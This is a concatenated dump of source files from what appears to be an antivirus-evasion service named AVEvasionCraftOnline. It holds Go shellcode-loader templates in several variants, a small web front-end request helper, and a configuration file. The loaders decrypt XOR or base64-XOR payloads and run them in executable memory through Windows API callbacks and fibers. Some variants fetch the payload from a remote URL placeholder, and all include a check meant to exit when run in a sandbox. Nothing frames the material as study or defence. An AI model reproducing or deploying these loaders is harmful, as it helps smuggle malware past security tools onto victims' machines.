-------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "github.com/valyala/fasthttp" 9 | ) 10 | 11 | var ( 12 | timer int 13 | dummy [522]byte 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | NULL = 0 21 | RESOURCE_ENUM_VALIDATE = 0x0008 22 | ) 23 | 24 | var ( 25 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 26 | ntdll = syscall.NewLazyDLL("ntdll.dll") 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | LoadLibraryW = kernel32.NewProc("LoadLibraryW") 29 | EnumResourceTypesExW = kernel32.NewProc("EnumResourceTypesExW") 30 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode []byte) { 34 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 35 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 36 | 37 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") 38 | dll1, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) 39 | EnumResourceTypesExW.Call(dll1, addr, NULL, RESOURCE_ENUM_VALIDATE, NULL) 40 | } 41 | 42 | func XorDecrypt(plaintext []byte, key []byte) []byte { 43 | ciphertext := make([]byte, len(plaintext)) 44 | keyLength := len(key) 45 | for i, byte := range plaintext { 46 | keyByte := key[i%keyLength] 47 | encryptedByte := byte ^ keyByte 48 | ciphertext[i] = encryptedByte 49 | } 50 | return ciphertext 51 | } 52 | 53 | func DecryptData(shellcode []byte) []byte { 54 | key := []byte{{{Key}}} 55 | decryptShellcode := XorDecrypt(shellcode, key) 56 | return decryptShellcode 57 | } 58 | 59 | func fetchShellcode(url string) []byte { 60 | _, body, _ := fasthttp.Get(nil, url) 61 | return body 62 | } 63 | 64 | func main() { 65 | args := os.Args[0] 66 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 67 | os.Exit(0) 68 | } 69 | 70 | ciphertext := 
fetchShellcode("{{REMOTE_URL}}") 71 | byteData := DecryptData(ciphertext) 72 | Callback(byteData) 73 | } 74 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/base64Xor/LOCAL/go_SymEnumProcesses.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | FALSE = 0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 23 | ntdll = syscall.NewLazyDLL("ntdll.dll") 24 | Dbghelp = syscall.NewLazyDLL("Dbghelp.dll") 25 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 26 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 27 | SymInitialize = Dbghelp.NewProc("SymInitialize") 28 | SymEnumProcesses = Dbghelp.NewProc("SymEnumProcesses") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | if err != nil && err.Error() != "The operation completed successfully." 
{ 35 | syscall.Exit(0) 36 | } 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | Proces, _, _ := GetCurrentProcess.Call() 39 | SymInitialize.Call(Proces, 0, FALSE) 40 | SymEnumProcesses.Call(addr, 0) 41 | } 42 | 43 | func XorDecrypt(plaintext []byte, key []byte) []byte { 44 | ciphertext := make([]byte, len(plaintext)) 45 | keyLength := len(key) 46 | for i, byte := range plaintext { 47 | keyByte := key[i%keyLength] 48 | encryptedByte := byte ^ keyByte 49 | ciphertext[i] = encryptedByte 50 | } 51 | return ciphertext 52 | } 53 | 54 | func DecryptData(v2 string) []byte { 55 | key := []byte{{{Key}}} 56 | v22, _ := base64.StdEncoding.DecodeString(v2) 57 | v222 := XorDecrypt(v22, key) 58 | return v222 59 | } 60 | 61 | func main() { 62 | args := os.Args[0] 63 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 64 | os.Exit(0) 65 | } 66 | 67 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 68 | if err != nil { 69 | return 70 | } 71 | byteData := DecryptData(string(ciphertext)) 72 | Callback(byteData) 73 | } 74 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/base64Xor/LOCAL/go_SetTimer.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | g_InitOnce [0]byte 12 | lpContext [0]byte 13 | ) 14 | 15 | type MSG struct { 16 | } 17 | 18 | const ( 19 | MEM_COMMIT = 0x1000 20 | MEM_RESERVE = 0x2000 21 | PAGE_EXECUTE_READWRITE = 0x40 22 | NULL = 0 23 | dummy = 0 24 | ) 25 | 26 | var ( 27 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 28 | ntdll = syscall.NewLazyDLL("ntdll.dll") 29 | User32 = syscall.NewLazyDLL("User32.dll") 30 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 31 | SetTimer = User32.NewProc("SetTimer") 32 | GetMessageW = User32.NewProc("GetMessageW") 33 | DispatchMessageW = 
User32.NewProc("DispatchMessageW") 34 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 35 | ) 36 | 37 | func Callback(shellcode []byte) { 38 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 39 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 40 | msg := MSG{} 41 | SetTimer.Call(NULL, dummy, NULL, addr) 42 | GetMessageW.Call((uintptr)(unsafe.Pointer(&msg)), NULL, 0, 0) 43 | DispatchMessageW.Call((uintptr)(unsafe.Pointer(&msg))) 44 | } 45 | 46 | func XorDecrypt(plaintext []byte, key []byte) []byte { 47 | ciphertext := make([]byte, len(plaintext)) 48 | keyLength := len(key) 49 | for i, byte := range plaintext { 50 | keyByte := key[i%keyLength] 51 | encryptedByte := byte ^ keyByte 52 | ciphertext[i] = encryptedByte 53 | } 54 | return ciphertext 55 | } 56 | 57 | func DecryptData(v2 string) []byte { 58 | key := []byte{{{Key}}} 59 | v22, _ := base64.StdEncoding.DecodeString(v2) 60 | v222 := XorDecrypt(v22, key) 61 | return v222 62 | } 63 | 64 | func main() { 65 | args := os.Args[0] 66 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 67 | os.Exit(0) 68 | } 69 | 70 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 71 | if err != nil { 72 | return 73 | } 74 | byteData := DecryptData(string(ciphertext)) 75 | Callback(byteData) 76 | } 77 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/base64Xor/REMOTE/go_EnumResourceTypesExW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 | ) 11 | 12 | var ( 13 | timer int 14 | dummy [522]byte 15 | ) 16 | 17 | const ( 18 | MEM_COMMIT = 0x1000 19 | MEM_RESERVE = 0x2000 20 | PAGE_EXECUTE_READWRITE = 0x40 21 | NULL = 0 22 | RESOURCE_ENUM_VALIDATE = 0x0008 23 | ) 24 | 25 | var ( 26 | kernel32 
= syscall.NewLazyDLL("kernel32.dll") 27 | ntdll = syscall.NewLazyDLL("ntdll.dll") 28 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 29 | LoadLibraryW = kernel32.NewProc("LoadLibraryW") 30 | EnumResourceTypesExW = kernel32.NewProc("EnumResourceTypesExW") 31 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 32 | ) 33 | 34 | func Callback(shellcode []byte) { 35 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | 38 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") 39 | dll1, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) 40 | EnumResourceTypesExW.Call(dll1, addr, NULL, RESOURCE_ENUM_VALIDATE, NULL) 41 | } 42 | 43 | func XorDecrypt(plaintext []byte, key []byte) []byte { 44 | ciphertext := make([]byte, len(plaintext)) 45 | keyLength := len(key) 46 | for i, byte := range plaintext { 47 | keyByte := key[i%keyLength] 48 | encryptedByte := byte ^ keyByte 49 | ciphertext[i] = encryptedByte 50 | } 51 | return ciphertext 52 | } 53 | 54 | func DecryptData(v2 string) []byte { 55 | key := []byte{{{Key}}} 56 | v22, _ := base64.StdEncoding.DecodeString(v2) 57 | v222 := XorDecrypt(v22, key) 58 | return v222 59 | } 60 | 61 | func fetchShellcode(url string) []byte { 62 | _, body, _ := fasthttp.Get(nil, url) 63 | return body 64 | } 65 | 66 | func main() { 67 | args := os.Args[0] 68 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 69 | os.Exit(0) 70 | } 71 | 72 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 73 | byteData := DecryptData(string(ciphertext)) 74 | Callback(byteData) 75 | } 76 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/xor/REMOTE/go_SymEnumProcesses.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | 
"github.com/valyala/fasthttp" 9 | ) 10 | 11 | var ( 12 | timer int 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | FALSE = 0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | Dbghelp = syscall.NewLazyDLL("Dbghelp.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 28 | SymInitialize = Dbghelp.NewProc("SymInitialize") 29 | SymEnumProcesses = Dbghelp.NewProc("SymEnumProcesses") 30 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode []byte) { 34 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 35 | if err != nil && err.Error() != "The operation completed successfully." { 36 | syscall.Exit(0) 37 | } 38 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 39 | Proces, _, _ := GetCurrentProcess.Call() 40 | SymInitialize.Call(Proces, 0, FALSE) 41 | SymEnumProcesses.Call(addr, 0) 42 | } 43 | 44 | func XorDecrypt(plaintext []byte, key []byte) []byte { 45 | ciphertext := make([]byte, len(plaintext)) 46 | keyLength := len(key) 47 | for i, byte := range plaintext { 48 | keyByte := key[i%keyLength] 49 | encryptedByte := byte ^ keyByte 50 | ciphertext[i] = encryptedByte 51 | } 52 | return ciphertext 53 | } 54 | 55 | func DecryptData(shellcode []byte) []byte { 56 | key := []byte{{{Key}}} 57 | decryptShellcode := XorDecrypt(shellcode, key) 58 | return decryptShellcode 59 | } 60 | 61 | func fetchShellcode(url string) []byte { 62 | _, body, _ := fasthttp.Get(nil, url) 63 | return body 64 | } 65 | 66 | func main() { 67 | args := os.Args[0] 68 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 69 | os.Exit(0) 70 | } 71 | 72 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 73 | byteData := DecryptData(ciphertext) 74 | 
Callback(byteData) 75 | } 76 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/xor/REMOTE/go_SetTimer.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "github.com/valyala/fasthttp" 9 | ) 10 | 11 | var ( 12 | g_InitOnce [0]byte 13 | lpContext [0]byte 14 | ) 15 | 16 | type MSG struct { 17 | } 18 | 19 | const ( 20 | MEM_COMMIT = 0x1000 21 | MEM_RESERVE = 0x2000 22 | PAGE_EXECUTE_READWRITE = 0x40 23 | NULL = 0 24 | dummy = 0 25 | ) 26 | 27 | var ( 28 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 29 | ntdll = syscall.NewLazyDLL("ntdll.dll") 30 | User32 = syscall.NewLazyDLL("User32.dll") 31 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 32 | SetTimer = User32.NewProc("SetTimer") 33 | GetMessageW = User32.NewProc("GetMessageW") 34 | DispatchMessageW = User32.NewProc("DispatchMessageW") 35 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 36 | ) 37 | 38 | func Callback(shellcode []byte) { 39 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 40 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 41 | msg := MSG{} 42 | SetTimer.Call(NULL, dummy, NULL, addr) 43 | GetMessageW.Call((uintptr)(unsafe.Pointer(&msg)), NULL, 0, 0) 44 | DispatchMessageW.Call((uintptr)(unsafe.Pointer(&msg))) 45 | } 46 | 47 | func XorDecrypt(plaintext []byte, key []byte) []byte { 48 | ciphertext := make([]byte, len(plaintext)) 49 | keyLength := len(key) 50 | for i, byte := range plaintext { 51 | keyByte := key[i%keyLength] 52 | encryptedByte := byte ^ keyByte 53 | ciphertext[i] = encryptedByte 54 | } 55 | return ciphertext 56 | } 57 | 58 | func DecryptData(shellcode []byte) []byte { 59 | key := []byte{{{Key}}} 60 | decryptShellcode := XorDecrypt(shellcode, key) 61 | return decryptShellcode 62 | } 63 | 64 | func fetchShellcode(url 
string) []byte { 65 | _, body, _ := fasthttp.Get(nil, url) 66 | return body 67 | } 68 | 69 | func main() { 70 | args := os.Args[0] 71 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 72 | os.Exit(0) 73 | } 74 | 75 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 76 | byteData := DecryptData(ciphertext) 77 | Callback(byteData) 78 | } 79 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/base64Xor/REMOTE/go_SymEnumProcesses.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 | ) 11 | 12 | var ( 13 | timer int 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | FALSE = 0 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | Dbghelp = syscall.NewLazyDLL("Dbghelp.dll") 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 29 | SymInitialize = Dbghelp.NewProc("SymInitialize") 30 | SymEnumProcesses = Dbghelp.NewProc("SymEnumProcesses") 31 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 32 | ) 33 | 34 | func Callback(shellcode []byte) { 35 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 36 | if err != nil && err.Error() != "The operation completed successfully." 
{ 37 | syscall.Exit(0) 38 | } 39 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 40 | Proces, _, _ := GetCurrentProcess.Call() 41 | SymInitialize.Call(Proces, 0, FALSE) 42 | SymEnumProcesses.Call(addr, 0) 43 | } 44 | 45 | func XorDecrypt(plaintext []byte, key []byte) []byte { 46 | ciphertext := make([]byte, len(plaintext)) 47 | keyLength := len(key) 48 | for i, byte := range plaintext { 49 | keyByte := key[i%keyLength] 50 | encryptedByte := byte ^ keyByte 51 | ciphertext[i] = encryptedByte 52 | } 53 | return ciphertext 54 | } 55 | 56 | func DecryptData(v2 string) []byte { 57 | key := []byte{{{Key}}} 58 | v22, _ := base64.StdEncoding.DecodeString(v2) 59 | v222 := XorDecrypt(v22, key) 60 | return v222 61 | } 62 | 63 | func fetchShellcode(url string) []byte { 64 | _, body, _ := fasthttp.Get(nil, url) 65 | return body 66 | } 67 | 68 | func main() { 69 | args := os.Args[0] 70 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 71 | os.Exit(0) 72 | } 73 | 74 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 75 | byteData := DecryptData(string(ciphertext)) 76 | Callback(byteData) 77 | } 78 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/base64Xor/REMOTE/go_SetTimer.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 | ) 11 | 12 | var ( 13 | g_InitOnce [0]byte 14 | lpContext [0]byte 15 | ) 16 | 17 | type MSG struct { 18 | } 19 | 20 | const ( 21 | MEM_COMMIT = 0x1000 22 | MEM_RESERVE = 0x2000 23 | PAGE_EXECUTE_READWRITE = 0x40 24 | NULL = 0 25 | dummy = 0 26 | ) 27 | 28 | var ( 29 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 30 | ntdll = syscall.NewLazyDLL("ntdll.dll") 31 | User32 = syscall.NewLazyDLL("User32.dll") 32 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 33 | SetTimer = 
User32.NewProc("SetTimer") 34 | GetMessageW = User32.NewProc("GetMessageW") 35 | DispatchMessageW = User32.NewProc("DispatchMessageW") 36 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 37 | ) 38 | 39 | func Callback(shellcode []byte) { 40 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 41 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 42 | msg := MSG{} 43 | SetTimer.Call(NULL, dummy, NULL, addr) 44 | GetMessageW.Call((uintptr)(unsafe.Pointer(&msg)), NULL, 0, 0) 45 | DispatchMessageW.Call((uintptr)(unsafe.Pointer(&msg))) 46 | } 47 | 48 | func XorDecrypt(plaintext []byte, key []byte) []byte { 49 | ciphertext := make([]byte, len(plaintext)) 50 | keyLength := len(key) 51 | for i, byte := range plaintext { 52 | keyByte := key[i%keyLength] 53 | encryptedByte := byte ^ keyByte 54 | ciphertext[i] = encryptedByte 55 | } 56 | return ciphertext 57 | } 58 | 59 | func DecryptData(v2 string) []byte { 60 | key := []byte{{{Key}}} 61 | v22, _ := base64.StdEncoding.DecodeString(v2) 62 | v222 := XorDecrypt(v22, key) 63 | return v222 64 | } 65 | 66 | func fetchShellcode(url string) []byte { 67 | _, body, _ := fasthttp.Get(nil, url) 68 | return body 69 | } 70 | 71 | func main() { 72 | args := os.Args[0] 73 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 74 | os.Exit(0) 75 | } 76 | 77 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 78 | byteData := DecryptData(string(ciphertext)) 79 | Callback(byteData) 80 | } 81 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/xor/EMBEDDED/go_FiberContextEdit.go: -------------------------------------------------------------------------------- 1 | package Loads 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | g_InitOnce [0]byte 12 | lpContext [0]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 
| PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 26 | CreateFiber = kernel32.NewProc("CreateFiber") 27 | SwitchToFiber = kernel32.NewProc("SwitchToFiber") 28 | ConvertThreadToFiber = kernel32.NewProc("ConvertThreadToFiber") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func dummy() { 33 | var age string 34 | fmt.Scanln(&age) 35 | } 36 | 37 | func Callback(shellcode []byte) { 38 | var d func() 39 | d = dummy 40 | ConvertThreadToFiber.Call(NULL) 41 | lpFiber, err1, _ := CreateFiber.Call(0x100, (uintptr)(unsafe.Pointer(&d)), NULL) 42 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 43 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 44 | if lpFiber == NULL { 45 | fmt.Printf("GLE : %d\n", err1) 46 | os.Exit(0) 47 | } 48 | 49 | tgtFuncAddr := (*uintptr)(unsafe.Pointer(lpFiber + uintptr(0xB0))) 50 | *tgtFuncAddr = addr 51 | fmt.Println(tgtFuncAddr) 52 | SwitchToFiber.Call(lpFiber) 53 | } 54 | 55 | func XorDecrypt(plaintext []byte, key []byte) []byte { 56 | ciphertext := make([]byte, len(plaintext)) 57 | keyLength := len(key) 58 | for i, byte := range plaintext { 59 | keyByte := key[i%keyLength] 60 | encryptedByte := byte ^ keyByte 61 | ciphertext[i] = encryptedByte 62 | } 63 | return ciphertext 64 | } 65 | 66 | func DecryptData(shellcode []byte) []byte { 67 | key := []byte{{{Key}}} 68 | decryptShellcode := XorDecrypt(shellcode, key) 69 | return decryptShellcode 70 | } 71 | 72 | func main() { 73 | args := os.Args[0] 74 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 75 | os.Exit(0) 76 | } 77 | 78 | ciphertext := []byte{{{Shellcode}}} 79 | byteData := DecryptData(ciphertext) 80 | Callback(byteData) 81 | } 82 | 
-------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/utils/request.js: -------------------------------------------------------------------------------- 1 | import axios from 'axios' 2 | import { ElMessage } from 'element-plus' 3 | import store from '../store' 4 | import { getToken } from './auth.js' 5 | 6 | // 创建axios实例 7 | const service = axios.create({ 8 | baseURL: import.meta.env.VITE_BASE_API, // url = base url + request url 9 | withCredentials: true, // send cookies when cross-domain requests 10 | timeout: 15000 // request timeout 11 | }) 12 | 13 | // 请求拦截 14 | service.interceptors.request.use( 15 | config => { 16 | // do something before request is sent 17 | 18 | if (store.getters.token) { 19 | // 让每个请求携带令牌 20 | // ['X-Token'] is a custom headers key 21 | // please modify it according to the actual situation 22 | config.headers['BBS-Token'] = getToken() 23 | } 24 | return config 25 | }, 26 | error => { 27 | // do something with request error 28 | console.log(error) // for debug 29 | return Promise.reject(error) 30 | } 31 | ) 32 | 33 | // 响应拦截 34 | service.interceptors.response.use( 35 | response => { 36 | const res = response 37 | return res 38 | /* if (res.code !== 200) { 39 | ElMessage({ 40 | message: res.message || '请求错误', 41 | type: 'error', 42 | duration: 5 * 1000 43 | }) 44 | 45 | // 50008: Illegal token; 50012: Other clients logged in; 50014: Token expired; 46 | if (res.code === 50008 || res.code === 50012 || res.code === 50014) { 47 | // 重新登录 48 | ElMessageBox.confirm( 49 | 'You have been logged out, you can cancel to stay on this page, or log in again', 50 | '确认注销', 51 | { 52 | confirmButtonText: '重新登录', 53 | cancelButtonText: '取消', 54 | type: 'warning' 55 | } 56 | ).then(() => { 57 | store.dispatch('user/resetToken').then(() => { 58 | location.reload() 59 | }) 60 | }) 61 | } 62 | return Promise.reject(new Error(res.message || '请求错误')) 63 | } else { 64 | return res 65 | }*/ 66 | }, 67 | 
error => { 68 | console.log('err' + error) // for debug 69 | ElMessage({ 70 | message: error.message, 71 | type: 'error', 72 | duration: 5 * 1000 73 | }) 74 | return Promise.reject(error) 75 | } 76 | ) 77 | 78 | export default service 79 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/base64Xor/EMBEDDED/go_FiberContextEdit.go: -------------------------------------------------------------------------------- 1 | package Loads 2 | 3 | import ( 4 | "encoding/base64" 5 | "fmt" 6 | "os" 7 | "syscall" 8 | "unsafe" 9 | ) 10 | 11 | var ( 12 | g_InitOnce [0]byte 13 | lpContext [0]byte 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | NULL = 0 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | CreateFiber = kernel32.NewProc("CreateFiber") 28 | SwitchToFiber = kernel32.NewProc("SwitchToFiber") 29 | ConvertThreadToFiber = kernel32.NewProc("ConvertThreadToFiber") 30 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func dummy() { 34 | var age string 35 | fmt.Scanln(&age) 36 | } 37 | 38 | func Callback(shellcode []byte) { 39 | var d func() 40 | d = dummy 41 | ConvertThreadToFiber.Call(NULL) 42 | lpFiber, err1, _ := CreateFiber.Call(0x100, (uintptr)(unsafe.Pointer(&d)), NULL) 43 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 44 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 45 | if lpFiber == NULL { 46 | fmt.Printf("GLE : %d\n", err1) 47 | os.Exit(0) 48 | } 49 | 50 | tgtFuncAddr := (*uintptr)(unsafe.Pointer(lpFiber + uintptr(0xB0))) 51 | *tgtFuncAddr = addr 52 | fmt.Println(tgtFuncAddr) 53 | SwitchToFiber.Call(lpFiber) 54 | } 55 | 56 | func XorDecrypt(plaintext []byte, key []byte) []byte { 57 | 
ciphertext := make([]byte, len(plaintext)) 58 | keyLength := len(key) 59 | for i, byte := range plaintext { 60 | keyByte := key[i%keyLength] 61 | encryptedByte := byte ^ keyByte 62 | ciphertext[i] = encryptedByte 63 | } 64 | return ciphertext 65 | } 66 | 67 | func DecryptData(v2 string) []byte { 68 | key := []byte{{{Key}}} 69 | v22, _ := base64.StdEncoding.DecodeString(v2) 70 | v222 := XorDecrypt(v22, key) 71 | return v222 72 | } 73 | 74 | func main() { 75 | args := os.Args[0] 76 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 77 | os.Exit(0) 78 | } 79 | 80 | ciphertext := "{{Shellcode}}" 81 | byteData := DecryptData(ciphertext) 82 | Callback(byteData) 83 | } 84 | -------------------------------------------------------------------------------- /application.yaml: -------------------------------------------------------------------------------- 1 | bypassav: 2 | templates-directory: D:/AVEvasionCraftOnline/template 3 | storage-directory: D:/AVEvasionCraftOnline/download 4 | compilerwork-directory: D:/AVEvasionCraftOnline/compiler 5 | templates-mapping: 6 | go_VirtualAlloc: 7 | loadMethod: 8 | - EMBEDDED 9 | - REMOTE 10 | - LOCAL 11 | transformation: 12 | - base64Xor 13 | - xor 14 | 15 | go_CertEnumSystemStore: 16 | loadMethod: 17 | - EMBEDDED 18 | - REMOTE 19 | - LOCAL 20 | transformation: 21 | - base64Xor 22 | - xor 23 | 24 | go_EnumChildWindows: 25 | loadMethod: 26 | - EMBEDDED 27 | - REMOTE 28 | - LOCAL 29 | transformation: 30 | - base64Xor 31 | - xor 32 | 33 | go_EnumFontsW: 34 | loadMethod: 35 | - EMBEDDED 36 | - REMOTE 37 | - LOCAL 38 | transformation: 39 | - base64Xor 40 | - xor 41 | 42 | go_EnumResourceTypesExW: 43 | loadMethod: 44 | - EMBEDDED 45 | - REMOTE 46 | - LOCAL 47 | transformation: 48 | - base64Xor 49 | - xor 50 | 51 | go_FiberContextEdit: 52 | loadMethod: 53 | - EMBEDDED 54 | - REMOTE 55 | - LOCAL 56 | transformation: 57 | - base64Xor 58 | - xor 59 | 60 | go_FlsAlloc: 61 | loadMethod: 62 | - EMBEDDED 63 | - REMOTE 64 | - LOCAL 65 | 
